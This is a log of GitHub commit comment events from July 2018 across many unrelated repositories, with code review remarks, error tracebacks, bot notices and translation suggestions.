{"id":"7998377697","type":"CommitCommentEvent","actor":{"login":"Selectah"},"repo":{"name":"XaxiMusic/Lewd-Cats-Website"},"payload":{"comment":{"id":29788092,"position":null,"line":null,"path":null,"commit_id":"b2d6b029402893424daa4e18a088b20f23482ee2","created_at":"2018-07-21T10:05:55Z","updated_at":"2018-07-21T10:05:55Z","author_association":"NONE","body":"yeah Xaxi is developing <3 :+1: "}},"created_at":"2018-07-21T10:05:55Z"}
{"id":"7998377940","type":"CommitCommentEvent","actor":{"login":"kalpesh32"},"repo":{"name":"shoobomb/AWS-CodeDeploy-Example"},"payload":{"comment":{"id":29788093,"position":4,"line":4,"path":"index.html","commit_id":"8d8e3c840c962794d6a07e6ffba792c6f4d8b1e0","created_at":"2018-07-21T10:06:08Z","updated_at":"2018-07-21T10:06:08Z","author_association":"NONE","body":"tested"}},"created_at":"2018-07-21T10:06:08Z"}
{"id":"7998378548","type":"CommitCommentEvent","actor":{"login":"NandithaMallesh"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29788095,"position":null,"line":null,"path":null,"commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-21T10:06:40Z","updated_at":"2018-07-21T10:06:40Z","author_association":"COLLABORATOR","body":"It is already Indented with 2 spaces. That is the change shown here in the commit.  If you still find issues with the indenting, we can discuss the standard we would like to follow and correct them accordingly.\r\nIf there are discrepancies in the formatting, let's check it for every file and make sure they are all consistent. "}},"created_at":"2018-07-21T10:06:40Z"}
{"id":"7998379603","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/Ryujinx"},"payload":{"comment":{"id":29788097,"position":null,"line":null,"path":null,"commit_id":"8482abfb7e100ccd8f9e05ee8513d66fd13db442","created_at":"2018-07-21T10:07:36Z","updated_at":"2018-07-21T10:07:36Z","author_association":"OWNER","body":"This allows Mania 1.04 to boot in the emulator.\r\n![2018-07-21_03-05-17](https://user-images.githubusercontent.com/15317421/43034547-36d177c6-8c93-11e8-9656-c7630f1f20bc.png)\r\n"}},"created_at":"2018-07-21T10:07:36Z"}
{"id":"7998379645","type":"CommitCommentEvent","actor":{"login":"XaxiMusic"},"repo":{"name":"XaxiMusic/Lewd-Cats-Website"},"payload":{"comment":{"id":29788098,"position":null,"line":null,"path":null,"commit_id":"b2d6b029402893424daa4e18a088b20f23482ee2","created_at":"2018-07-21T10:07:39Z","updated_at":"2018-07-21T10:07:39Z","author_association":"OWNER","body":"You know it xD http://xaxi.loves.a.lewd.cat/9145.png"}},"created_at":"2018-07-21T10:07:39Z"}
{"id":"7998381492","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29788100,"position":null,"line":null,"path":null,"commit_id":"6838d29f1bad188144948815c9c39ad26d03e0ad","created_at":"2018-07-21T10:09:19Z","updated_at":"2018-07-21T10:09:19Z","author_association":"COLLABORATOR","body":"Puzzle `208-56cdec4f` disappeared from [`.drone.yml`](https://github.com/fidals/shopelectro/blob/master/.drone.yml), that's why I closed #210. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-21T10:09:19Z"}
{"id":"7998385012","type":"CommitCommentEvent","actor":{"login":"Selectah"},"repo":{"name":"XaxiMusic/Lewd-Cats-Website"},"payload":{"comment":{"id":29788101,"position":null,"line":null,"path":null,"commit_id":"b2d6b029402893424daa4e18a088b20f23482ee2","created_at":"2018-07-21T10:12:32Z","updated_at":"2018-07-21T10:12:32Z","author_association":"NONE","body":"yeah i love it :D :dancer: "}},"created_at":"2018-07-21T10:12:32Z"}
{"id":"7998385997","type":"CommitCommentEvent","actor":{"login":"zwcloud"},"repo":{"name":"zwcloud/ImGui"},"payload":{"comment":{"id":29788102,"position":null,"line":null,"path":null,"commit_id":"ad17026413fb57002deec6e4ca7a079bf773133e","created_at":"2018-07-21T10:13:28Z","updated_at":"2018-07-21T10:13:28Z","author_association":"OWNER","body":"Fixed! Forgot to append `ElemCount` to merged mesh's command.\r\n![image](https://user-images.githubusercontent.com/6965758/43034583-973eff92-8d11-11e8-84e3-c08464351306.png)\r\n"}},"created_at":"2018-07-21T10:13:28Z"}
{"id":"7998387048","type":"CommitCommentEvent","actor":{"login":"ynaessens"},"repo":{"name":"JeromeDevome/GRR"},"payload":{"comment":{"id":29788103,"position":null,"line":null,"path":null,"commit_id":"d50b0e4ae2362511e6b5c4462394c03576941070","created_at":"2018-07-21T10:14:30Z","updated_at":"2018-07-21T10:14:30Z","author_association":"COLLABORATOR","body":"Deuxième étape dans la reprise du calcul de l'apparence des pages plannings. À quelques corrections près, on retrouve l'apparence classique des thèmes \"historiques\" de GRR."}},"created_at":"2018-07-21T10:14:30Z"}
{"id":"7998387659","type":"CommitCommentEvent","actor":{"login":"fredvd"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":29788106,"position":null,"line":null,"path":null,"commit_id":"7d6038ee3e80405f92d516394dc2d199d64ca6cb","created_at":"2018-07-21T10:15:04Z","updated_at":"2018-07-21T10:15:04Z","author_association":"MEMBER","body":"@jensens @petschki buildout.coredev kgs ecosystem has plone.app.drafts still pinned to 1.0 . I don't see any 'breaking' changes in the plone.app.drafts changelog, only fixes and features. Ok to push the buildout.coredev pin up to plone.app.mosaic's kgs?  1.1.2 from march 2017?"}},"created_at":"2018-07-21T10:15:04Z"}
{"id":"7998390142","type":"CommitCommentEvent","actor":{"login":"jkkill"},"repo":{"name":"dotnet/designs"},"payload":{"comment":{"id":29788111,"position":4,"line":116,"path":"accepted/diagnostics/debugging-with-symbols-and-sources.md","commit_id":"af2bdca64b68d6a579ad63dc289e497479efb834","created_at":"2018-07-21T10:17:12Z","updated_at":"2018-07-21T10:17:12Z","author_association":"NONE","body":"accepted/diagnostics/debugging-with-symbols-and-sources.md"}},"created_at":"2018-07-21T10:17:12Z"}
{"id":"7998390302","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788112,"position":null,"line":null,"path":null,"commit_id":"3036726a9783bb953ddf1b7b9a62f2c27d0db7b3","created_at":"2018-07-21T10:17:20Z","updated_at":"2018-07-21T10:17:20Z","author_association":"CONTRIBUTOR","body":"I am aware that @exyi considers this as a bad idea in general, but I need a quick solution right now. \r\n\r\nFor the next release, I would prefer a method that would allow integrating IServiceProvider properly with a support for custom containers on OWIN. \r\nThen, we can remove these extensibility points or make them obsolete - they are not designed well and the ViewModelLoader's DisposeViewModelMethod misses the IDotvvmRequestContext parameter which makes it difficult to use anyway."}},"created_at":"2018-07-21T10:17:20Z"}
{"id":"7998390308","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29788113,"position":24,"line":24,"path":"lesson8/accessors.rb","commit_id":"0cabccb1066ef868ddd31f73dbb4fb3184164785","created_at":"2018-07-21T10:17:21Z","updated_at":"2018-07-21T10:17:21Z","author_association":"NONE","body":"вот смотри что будет, если попробовать воспользоваться твоим модулем:\r\n```ruby\r\n$ irb -r ./accessors.rb \r\n2.5.1 :001 > class A; extend Accessors; attr_accessor_with_history :a, :b; end;\r\n => [:a, :b] \r\n2.5.1 :002 > a = A.new\r\n => #<A:0x0000000001909a10> \r\n2.5.1 :003 > a.a = 1\r\nTraceback (most recent call last):\r\n        3: from /home/max/.rvm/rubies/ruby-2.5.1/bin/irb:11:in `<main>'\r\n        2: from (irb):3\r\n        1: from .../accessors.rb:10:in `block (2 levels) in attr_accessor_with_history'\r\nNoMethodError (undefined method `<<' for nil:NilClass)\r\n```"}},"created_at":"2018-07-21T10:17:21Z"}
{"id":"7998391784","type":"CommitCommentEvent","actor":{"login":"jkkill"},"repo":{"name":"dotnet/designs"},"payload":{"comment":{"id":29788115,"position":5,"line":116,"path":"accepted/diagnostics/debugging-with-symbols-and-sources.md","commit_id":"af2bdca64b68d6a579ad63dc289e497479efb834","created_at":"2018-07-21T10:18:43Z","updated_at":"2018-07-21T10:18:43Z","author_association":"NONE","body":"af2bdca"}},"created_at":"2018-07-21T10:18:43Z"}
{"id":"7998391947","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29788116,"position":24,"line":24,"path":"lesson8/accessors.rb","commit_id":"0cabccb1066ef868ddd31f73dbb4fb3184164785","created_at":"2018-07-21T10:18:52Z","updated_at":"2018-07-21T10:18:52Z","author_association":"NONE","body":"у меня создается впечатление, что ты не пробовала использовать свой модуль )))\r\nон же не работает"}},"created_at":"2018-07-21T10:18:52Z"}
{"id":"7998392372","type":"CommitCommentEvent","actor":{"login":"MineAnPlay"},"repo":{"name":"GTNewHorizons/NewHorizons"},"payload":{"comment":{"id":29788117,"position":null,"line":null,"path":null,"commit_id":"958092c15801ff03865f730317d1dd704f71e86c","created_at":"2018-07-21T10:19:14Z","updated_at":"2018-07-21T10:19:14Z","author_association":"CONTRIBUTOR","body":"Replace this:\r\n`The Metabolic Frame is an Item used in an Apiary, which drastically increases a bee's mutation rate as well as slightly its production at the cost of high aura consumption.`\r\nWith this:\r\n`The Metabolic Frame is an Item used in an Apiary, which drastically increases a bee's mutation rate as well as a slight increase in it's production.`"}},"created_at":"2018-07-21T10:19:14Z"}
{"id":"7998393595","type":"CommitCommentEvent","actor":{"login":"Jermolene"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":29788118,"position":10,"line":10,"path":"plugins/tiddlywiki/comments/readme.tid","commit_id":"acaa07a964a004759ddb8fb755484918b3322815","created_at":"2018-07-21T10:20:10Z","updated_at":"2018-07-21T10:20:10Z","author_association":"OWNER","body":"It's confusingly worded: the editing buttons appear if $:/status/IsReadOnly is not set to `yes`; in other words, they will appear if the tiddler is missing, as well is if the tiddler is set to `yes`."}},"created_at":"2018-07-21T10:20:10Z"}
{"id":"7998393703","type":"CommitCommentEvent","actor":{"login":"jkkill"},"repo":{"name":"dotnet/designs"},"payload":{"comment":{"id":29788119,"position":1,"line":113,"path":"accepted/diagnostics/debugging-with-symbols-and-sources.md","commit_id":"af2bdca64b68d6a579ad63dc289e497479efb834","created_at":"2018-07-21T10:20:14Z","updated_at":"2018-07-21T10:20:14Z","author_association":"NONE","body":"#41\r\n"}},"created_at":"2018-07-21T10:20:14Z"}
{"id":"7998394347","type":"CommitCommentEvent","actor":{"login":"jkkill"},"repo":{"name":"dotnet/designs"},"payload":{"comment":{"id":29788120,"position":4,"line":116,"path":"accepted/diagnostics/debugging-with-symbols-and-sources.md","commit_id":"af2bdca64b68d6a579ad63dc289e497479efb834","created_at":"2018-07-21T10:20:48Z","updated_at":"2018-07-21T10:20:48Z","author_association":"NONE","body":"#41"}},"created_at":"2018-07-21T10:20:48Z"}
{"id":"7998394356","type":"CommitCommentEvent","actor":{"login":"jperedadnr"},"repo":{"name":"devoxx/MyDevoxxGluon"},"payload":{"comment":{"id":29788121,"position":15,"line":104,"path":"DevoxxClientMobile/src/main/java/com/devoxx/views/cell/ScheduleCell.java","commit_id":"963a0c3d7c610092365c14caa606af471e503b05","created_at":"2018-07-21T10:20:49Z","updated_at":"2018-07-21T10:20:49Z","author_association":"COLLABORATOR","body":"if `showSessionType` is false you are adding two nodes to every cell unnecessary.\r\n"}},"created_at":"2018-07-21T10:20:49Z"}
{"id":"7998403462","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29788140,"position":null,"line":null,"path":null,"commit_id":"9ba9c4842298a26b5b842394501619491f382092","created_at":"2018-07-21T10:29:15Z","updated_at":"2018-07-21T10:29:15Z","author_association":"CONTRIBUTOR","body":"\"Themselfes\" sollte durch \"themselves\" ersetzt werden. 😏"}},"created_at":"2018-07-21T10:29:15Z"}
{"id":"7998405369","type":"CommitCommentEvent","actor":{"login":"zhouqw520"},"repo":{"name":"zhouqw520/HelloWorld"},"payload":{"comment":{"id":29788145,"position":4,"line":8,"path":"HelloWorld/src/com/dcits/HelloWorld.java","commit_id":"e8912c8a618e2d66e209b06eaafcc8a92e7c3fdf","created_at":"2018-07-21T10:30:54Z","updated_at":"2018-07-21T10:30:54Z","author_association":"OWNER","body":"乱码问题"}},"created_at":"2018-07-21T10:30:54Z"}
{"id":"7998406073","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29788146,"position":6,"line":12,"path":"Lesson_1/right_triangle.rb","commit_id":"4919fc934d8afc3f9fb55b48717eaabc2ff8f243","created_at":"2018-07-21T10:31:34Z","updated_at":"2018-07-21T10:31:34Z","author_association":"NONE","body":"и в третий раз я оставлю тот же комментарий к этой строке ))\r\nнас равнобедренность интересует только для прямоугольного треугольника, поэтому:\r\n> если треугольник прямоугольный и его катеты равны, то он равнобедренный и при этом прямоугольный треугольник не может быть равносторонним, поэтому последняя проверка не имеет смысла"}},"created_at":"2018-07-21T10:31:34Z"}
{"id":"7998407032","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29788149,"position":null,"line":null,"path":null,"commit_id":"d4f86d73209c123fdcec1a91a619478c79362334","created_at":"2018-07-21T10:32:22Z","updated_at":"2018-07-21T10:32:22Z","author_association":"COLLABORATOR","body":"Also see [Issue 689](https://github.com/weidai11/cryptopp/issues/689) and [Issue 690](https://github.com/weidai11/cryptopp/issues/690)."}},"created_at":"2018-07-21T10:32:22Z"}
{"id":"7998415915","type":"CommitCommentEvent","actor":{"login":"Kr1ss-XD"},"repo":{"name":"trizen/trizen"},"payload":{"comment":{"id":29788155,"position":null,"line":null,"path":null,"commit_id":"bea9c8d3448d73867aa39534d48d465814d0d0f5","created_at":"2018-07-21T10:40:52Z","updated_at":"2018-07-21T10:40:52Z","author_association":"NONE","body":":+1:  great thx"}},"created_at":"2018-07-21T10:40:52Z"}
{"id":"7998419004","type":"CommitCommentEvent","actor":{"login":"ryanzhu11"},"repo":{"name":"ryanzhu11/mygit"},"payload":{"comment":{"id":29788157,"position":null,"line":null,"path":null,"commit_id":"649d82089bcc1bed746a0f1c8778bcbe94694f0e","created_at":"2018-07-21T10:43:41Z","updated_at":"2018-07-21T10:43:41Z","author_association":"OWNER","body":"abcdefg"}},"created_at":"2018-07-21T10:43:41Z"}
{"id":"7998421146","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"auth0-blog/blog-refresh-tokens-sample"},"payload":{"comment":{"id":29788161,"position":null,"line":null,"path":null,"commit_id":"dc5aa83231623e71b72d0799ac749ad9e87f3307","created_at":"2018-07-21T10:45:46Z","updated_at":"2018-07-21T10:45:46Z","author_association":"NONE","body":"dc5aa83"}},"created_at":"2018-07-21T10:45:46Z"}
{"id":"7998422147","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Gemorroj/phpmyadmin"},"payload":{"comment":{"id":29788162,"position":null,"line":null,"path":null,"commit_id":"07d4014f1c72a0102bc76b3d71447fdc204497d7","created_at":"2018-07-21T10:46:44Z","updated_at":"2018-07-21T10:46:44Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-21T10:46:44Z"}
{"id":"7998423066","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"Xaratas/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29788163,"position":null,"line":null,"path":null,"commit_id":"d71c9fb4c5e66defaa345a1491679bef9f5cc163","created_at":"2018-07-21T10:47:39Z","updated_at":"2018-07-21T10:47:39Z","author_association":"NONE","body":"Ja, das hatte ich mir auch gedacht... Ich vermute, die wollten sagen, dass man bei der Implosion erst angezogen und dann weggeschleutet wird. Eventuell sollte man auch statt \"durch die Luft schleudert\" wegschleudert sagen, aber ich weiss nicht, wie das im Spiel aussieht."}},"created_at":"2018-07-21T10:47:39Z"}
{"id":"7998425736","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"Xaratas/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29788167,"position":5,"line":124,"path":"exported/localized/de_patch/text/game/statuseffects.stringtable","commit_id":"1b17f216f1ab93d4a864292d8643159c5204a0df","created_at":"2018-07-21T10:50:19Z","updated_at":"2018-07-21T10:50:19Z","author_association":"NONE","body":"das gleiche Ziel ist nicht dasselbe Ziel.\r\n\r\nEin Ei gleicht dem anderen, ist aber nicht dasselbe Ei..."}},"created_at":"2018-07-21T10:50:19Z"}
{"id":"7998425794","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/yuzu"},"payload":{"comment":{"id":29788168,"position":null,"line":null,"path":null,"commit_id":"b8b1bce78857b993a6e631354b685d7c8305fc91","created_at":"2018-07-21T10:50:23Z","updated_at":"2018-07-21T10:50:23Z","author_association":"OWNER","body":"This change along with disabling assets allows Mania 1.04 to at least boot.\r\n![2018-07-21_03-50-20](https://user-images.githubusercontent.com/15317421/43034853-30d22662-8c99-11e8-944b-db65ecb42907.png)\r\n"}},"created_at":"2018-07-21T10:50:23Z"}
{"id":"7998426319","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29788169,"position":null,"line":null,"path":null,"commit_id":"01a9c193fc6a8357d1aedcccac292280d941ce09","created_at":"2018-07-21T10:50:52Z","updated_at":"2018-07-21T10:50:52Z","author_association":"CONTRIBUTOR","body":"@wolfbeast \r\nDoes this solution works only for Windows?\r\n"}},"created_at":"2018-07-21T10:50:52Z"}
{"id":"7998426768","type":"CommitCommentEvent","actor":{"login":"ied206"},"repo":{"name":"pebakery/pebakery"},"payload":{"comment":{"id":29788170,"position":null,"line":null,"path":null,"commit_id":"15663487d70b4e9f88e6fc03649a9e71f6dfb301","created_at":"2018-07-21T10:51:16Z","updated_at":"2018-07-21T10:51:16Z","author_association":"MEMBER","body":"Reference GitHub Issue #69"}},"created_at":"2018-07-21T10:51:16Z"}
{"id":"7998428103","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29788171,"position":null,"line":null,"path":null,"commit_id":"570faae2b8703d7e956920179f46c82f449ea2e0","created_at":"2018-07-21T10:52:35Z","updated_at":"2018-07-21T10:52:35Z","author_association":"NONE","body":"This could also be tested as simplification"}},"created_at":"2018-07-21T10:52:35Z"}
{"id":"7998428421","type":"CommitCommentEvent","actor":{"login":"EricHassan09"},"repo":{"name":"EricHassan09/lessons-_learned"},"payload":{"comment":{"id":29788172,"position":1,"line":1,"path":"README.md","commit_id":"697e634eb06966871c098cd732bae1c8a2572d70","created_at":"2018-07-21T10:52:55Z","updated_at":"2018-07-21T10:52:55Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-21T10:52:55Z"}
{"id":"7998428443","type":"CommitCommentEvent","actor":{"login":"jamggithub"},"repo":{"name":"jamggithub/taller_git"},"payload":{"comment":{"id":29788173,"position":null,"line":null,"path":null,"commit_id":"82928b8a7eae8b34d29b9233ff6adbba57f2e760","created_at":"2018-07-21T10:52:56Z","updated_at":"2018-07-21T10:52:56Z","author_association":"OWNER","body":"OK."}},"created_at":"2018-07-21T10:52:56Z"}
{"id":"7998428625","type":"CommitCommentEvent","actor":{"login":"petschki"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":29788174,"position":null,"line":null,"path":null,"commit_id":"7d6038ee3e80405f92d516394dc2d199d64ca6cb","created_at":"2018-07-21T10:53:07Z","updated_at":"2018-07-21T10:53:07Z","author_association":"MEMBER","body":"I‘d create a pull request with the Version change and look what Jenkins says about it. "}},"created_at":"2018-07-21T10:53:07Z"}
{"id":"7998428751","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788175,"position":null,"line":null,"path":null,"commit_id":"3036726a9783bb953ddf1b7b9a62f2c27d0db7b3","created_at":"2018-07-21T10:53:13Z","updated_at":"2018-07-21T10:53:13Z","author_association":"CONTRIBUTOR","body":"Ahh, you can't do workaround in the public API! Do you want to hold backwards compatibility with this? And it shold not be called `StaticCommandService` when it's works in all bindings, name static command service is completely arbitrary and it's not used on any other place."}},"created_at":"2018-07-21T10:53:13Z"}
{"id":"7998430228","type":"CommitCommentEvent","actor":{"login":"disc0nn3ct"},"repo":{"name":"disc0nn3ct/forctftask"},"payload":{"comment":{"id":29788176,"position":4,"line":3,"path":"README.md","commit_id":"43a249744e4c390210035fefb970b97582bf9c8f","created_at":"2018-07-21T10:54:36Z","updated_at":"2018-07-21T10:54:36Z","author_association":"OWNER","body":"Lol\r\n"}},"created_at":"2018-07-21T10:54:36Z"}
{"id":"7998431496","type":"CommitCommentEvent","actor":{"login":"Cjleto"},"repo":{"name":"Cjleto/laravel_ufficio"},"payload":{"comment":{"id":29788177,"position":null,"line":null,"path":null,"commit_id":"05265b8cc671f1d9b355d4c40d137b4693ea88f0","created_at":"2018-07-21T10:55:53Z","updated_at":"2018-07-21T10:55:53Z","author_association":"OWNER","body":"Test di commento al committente"}},"created_at":"2018-07-21T10:55:53Z"}
{"id":"7998431651","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"Xaratas/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29788178,"position":158,"line":16866,"path":"exported/localized/de_patch/text/game/abilities.stringtable","commit_id":"1b17f216f1ab93d4a864292d8643159c5204a0df","created_at":"2018-07-21T10:56:03Z","updated_at":"2018-07-21T10:56:03Z","author_association":"NONE","body":"Eventuell Überladen?"}},"created_at":"2018-07-21T10:56:03Z"}
{"id":"7998432529","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-bootstrap-feedstock"},"payload":{"comment":{"id":29788182,"position":null,"line":null,"path":null,"commit_id":"6fa89a32ffeebc1ef426de49a008027cbd0559de","created_at":"2018-07-21T10:56:48Z","updated_at":"2018-07-21T10:56:48Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-21T10:56:48Z"}
{"id":"7998432679","type":"CommitCommentEvent","actor":{"login":"ISosnovik"},"repo":{"name":"ISosnovik/top"},"payload":{"comment":{"id":29788183,"position":null,"line":null,"path":null,"commit_id":"c6fb212bfe9f622fadeaddfcffe8a78280dbb8bd","created_at":"2018-07-21T10:56:56Z","updated_at":"2018-07-21T10:56:56Z","author_association":"OWNER","body":"It is a temporary inconvenience. You can generate you small subset by using the code in the repo. I'll add the proper link soon"}},"created_at":"2018-07-21T10:56:56Z"}
{"id":"7998432738","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788184,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T10:57:00Z","updated_at":"2018-07-21T10:57:00Z","author_association":"CONTRIBUTOR","body":"Tell them that OWIN is deprecated anyway, you are not supposed to use it and that they can workaround it by registering the service in `DotvvmStartup`. We certainly don't need a public API to hack it."}},"created_at":"2018-07-21T10:57:00Z"}
{"id":"7998434138","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29788185,"position":null,"line":null,"path":null,"commit_id":"8f769f3cc6120a5577b0b97d903c8ee3c848fd52","created_at":"2018-07-21T10:58:24Z","updated_at":"2018-07-21T10:58:24Z","author_association":"CONTRIBUTOR","body":"I cheated and used `cerr` instead of `fprintf`.  Please let me know if you hit any errors on OSX."}},"created_at":"2018-07-21T10:58:24Z"}
{"id":"7998434199","type":"CommitCommentEvent","actor":{"login":"NelsonGilpin"},"repo":{"name":"NelsonGilpin/stream"},"payload":{"comment":{"id":29788186,"position":null,"line":null,"path":null,"commit_id":"eb5db4af58f971eca8bff229780d55f1d545653a","created_at":"2018-07-21T10:58:28Z","updated_at":"2018-07-21T10:58:28Z","author_association":"OWNER","body":"stores the list of npm packages & npm scripts that I'm using"}},"created_at":"2018-07-21T10:58:28Z"}
{"id":"7998435180","type":"CommitCommentEvent","actor":{"login":"bhanukandula"},"repo":{"name":"bhanukandula/devops"},"payload":{"comment":{"id":29788187,"position":null,"line":null,"path":null,"commit_id":"85ae8bf1c207176fd9df4d4f58445d60c05018c4","created_at":"2018-07-21T10:59:25Z","updated_at":"2018-07-21T10:59:25Z","author_association":"OWNER","body":"$ vagrant up\r\nBringing machine 'default' up with 'virtualbox' provider...\r\n==> default: Box 'ubuntu/xenial64' could not be found. Attempting to find and install...\r\n    default: Box Provider: virtualbox\r\n    default: Box Version: >= 0\r\nThe box 'ubuntu/xenial64' could not be found or\r\ncould not be accessed in the remote catalog. If this is a private\r\nbox on HashiCorp's Atlas, please verify you're logged in via\r\n`vagrant login`. Also, please double-check the name. The expanded\r\nURL and error message are shown below:\r\n\r\nURL: [\"https://atlas.hashicorp.com/ubuntu/xenial64\"]\r\nError: The requested URL returned error: 404 Not Found\r\n"}},"created_at":"2018-07-21T10:59:25Z"}
{"id":"7998435406","type":"CommitCommentEvent","actor":{"login":"Ron31"},"repo":{"name":"OfficialCRUGG/manageme"},"payload":{"comment":{"id":29788188,"position":null,"line":null,"path":null,"commit_id":"fba96856c6813f16640b650e3d2852929efbce09","created_at":"2018-07-21T10:59:39Z","updated_at":"2018-07-21T10:59:39Z","author_association":"COLLABORATOR","body":"name: invite Xdddd"}},"created_at":"2018-07-21T10:59:39Z"}
{"id":"7998435760","type":"CommitCommentEvent","actor":{"login":"rajgthub"},"repo":{"name":"rajgthub/group_research_node_class-4"},"payload":{"comment":{"id":29788190,"position":null,"line":null,"path":null,"commit_id":"3085cbf61b482a94ef8f765f000d051576dfc6b3","created_at":"2018-07-21T11:00:01Z","updated_at":"2018-07-21T11:00:01Z","author_association":"OWNER","body":"I have just copied and pasted all of the content from Francisca's notes, but we need to finalise by removing some lines. We can do it together later."}},"created_at":"2018-07-21T11:00:01Z"}
{"id":"7998436685","type":"CommitCommentEvent","actor":{"login":"rajgthub"},"repo":{"name":"rajgthub/group_research_node_class-4"},"payload":{"comment":{"id":29788198,"position":null,"line":null,"path":null,"commit_id":"3085cbf61b482a94ef8f765f000d051576dfc6b3","created_at":"2018-07-21T11:00:41Z","updated_at":"2018-07-21T11:00:41Z","author_association":"OWNER","body":"Please also check if I have made any spelling mistakes while writing up!"}},"created_at":"2018-07-21T11:00:41Z"}
{"id":"7998437234","type":"CommitCommentEvent","actor":{"login":"la0011"},"repo":{"name":"mhirabayashi/sylens"},"payload":{"comment":{"id":29788201,"position":null,"line":null,"path":null,"commit_id":"35c71c0e20c08fee1a8a26a4d1f10ed61f13f043","created_at":"2018-07-21T11:01:07Z","updated_at":"2018-07-21T11:01:07Z","author_association":"NONE","body":"Hi mhirabayashi,\r\n\r\nyour compiled plugins for nuke 10 and 11 work great.\r\n\r\nCould you compile win64 plugins for 11.1v4 and 11.2v1? \r\n\r\nCheers"}},"created_at":"2018-07-21T11:01:07Z"}
{"id":"7998437603","type":"CommitCommentEvent","actor":{"login":"petschki"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":29788204,"position":null,"line":null,"path":null,"commit_id":"7d6038ee3e80405f92d516394dc2d199d64ca6cb","created_at":"2018-07-21T11:01:28Z","updated_at":"2018-07-21T11:01:28Z","author_association":"MEMBER","body":"@fredvd erm... If thats possible by the way. Otherwise for me ok to use 1.1.2 ... never had any Problems in my mosaic projects."}},"created_at":"2018-07-21T11:01:28Z"}
{"id":"7998438222","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788205,"position":null,"line":null,"path":null,"commit_id":"e64177f355802261b0644c3a2d1f57c74e5ac458","created_at":"2018-07-21T11:02:01Z","updated_at":"2018-07-21T11:02:01Z","author_association":"NONE","body":"Victor Fernandez de Alba, Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T11:02:01Z"}
{"id":"7998438273","type":"CommitCommentEvent","actor":{"login":"abhinayagarwal"},"repo":{"name":"devoxx/MyDevoxxGluon"},"payload":{"comment":{"id":29788206,"position":15,"line":104,"path":"DevoxxClientMobile/src/main/java/com/devoxx/views/cell/ScheduleCell.java","commit_id":"963a0c3d7c610092365c14caa606af471e503b05","created_at":"2018-07-21T11:02:03Z","updated_at":"2018-07-21T11:02:03Z","author_association":"COLLABORATOR","body":"Do you suggest to move creation of Label inside `updateItem()`?"}},"created_at":"2018-07-21T11:02:03Z"}
